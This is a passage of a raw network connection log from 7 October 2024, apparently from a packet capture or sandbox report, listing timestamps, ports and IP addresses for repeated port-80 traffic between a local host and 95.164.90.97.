Oct 7, 2024 03:15:42.643733978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643740892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643755913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643770933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643771887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643786907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643793106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643802881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643831015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643831968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643848896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643877029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643882036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643894911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643919945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643939018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643945932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643961906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643978119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643980980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643992901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644020081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644023895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644036055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644061089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644068003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644083977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644094944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644098997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644117117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644133091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644134998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644150972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644156933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644166946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644186974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644192934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644201994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644218922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644233942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644234896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644252062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644254923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644268036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644298077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644299030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644315004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644335032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644340992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644357920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644371986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644373894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644392014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644406080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644419909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644426107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644434929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644452095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644469976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644469976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644488096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644504070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644505978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644520998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644526958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644536972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644562960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644566059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644578934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644599915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644608021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644614935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644629955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644635916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644659042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644669056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644676924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644694090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644705057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644726038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644759893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644771099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644788027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644804955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644818068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644820929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644839048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644843102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644865990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644866943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644882917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644901991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644911051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644927025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644939899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644942999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644969940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644977093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.644987106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.644998074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.645003080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645020008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645040035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.645046949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645064116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645078897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645080090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.645102978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.645107985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645124912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645138025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.645142078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645158052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645174980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.645179987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.645190001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.645231009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.670655966 CEST	443	49728	23.1.237.91	192.168.2.5
Oct 7, 2024 03:15:42.670737982 CEST	49728	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:42.696480036 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.696511030 CEST	443	49850	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.748321056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748337030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748354912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748385906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748402119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748415947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748425961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748431921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748456001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748469114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748482943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748485088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748506069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748511076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748528004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748543024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748543978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748558998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748583078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748584032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748599052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748610020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748615980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748635054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748636961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748662949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748672009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748678923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748696089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748718977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748733997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748737097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748749018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748764038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748773098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748785019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748789072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748806953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748807907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748823881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748841047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748843908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748857021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.748883009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.748904943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749170065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749186039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749202013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749219894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749229908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749236107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749258995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749269009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749284983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749294996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749299049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749315977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749320984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749363899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749372959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749387980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749427080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749433041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749443054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749458075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749474049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749476910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749492884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749511003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749512911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749526978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749552965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749576092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749583960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749600887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749615908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749633074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749648094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749648094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749663115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749679089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749689102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749701977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749711990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749717951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749732971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749733925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749747992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749772072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749806881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749844074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749859095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749882936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749890089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749897957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749913931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749929905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749924898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749943972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.749946117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.749984980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750004053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750210047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750225067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750240088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750283003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750309944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750319004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750334978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750349045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750366926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750375032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750391960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750406981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750411987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750423908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750439882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750441074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750458956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750483036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750519991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750574112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750598907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750613928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750627995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750643015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750648022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750668049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750674963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750693083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750709057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750724077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750724077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750740051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750755072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750767946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750772953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750787020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750792027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750802994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750818014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750818014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750839949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750844955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750859976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750875950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750875950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750891924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750907898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750914097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750922918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750938892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750941038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750955105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750966072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.750969887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750987053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.750988960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751028061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751065016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751081944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751096964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751112938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751137018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751142025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751163006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751178026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751178980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751194954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751203060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751209974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751224995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751240015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751255035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751255989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751281977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751295090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751296997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751312971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751317978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751331091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751347065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751362085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751362085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751377106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751399994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751405001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751415968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751425982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751430988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.751451969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.751487970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.839610100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839664936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839699030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839740038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839792013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839823961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839823961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.839858055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839890003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839890957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.839910984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.839926004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839947939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.839960098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.839972973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.839993954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840009928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840028048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840039015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840063095 CEST	80	49782	95.164.90.97	192.168.2.5
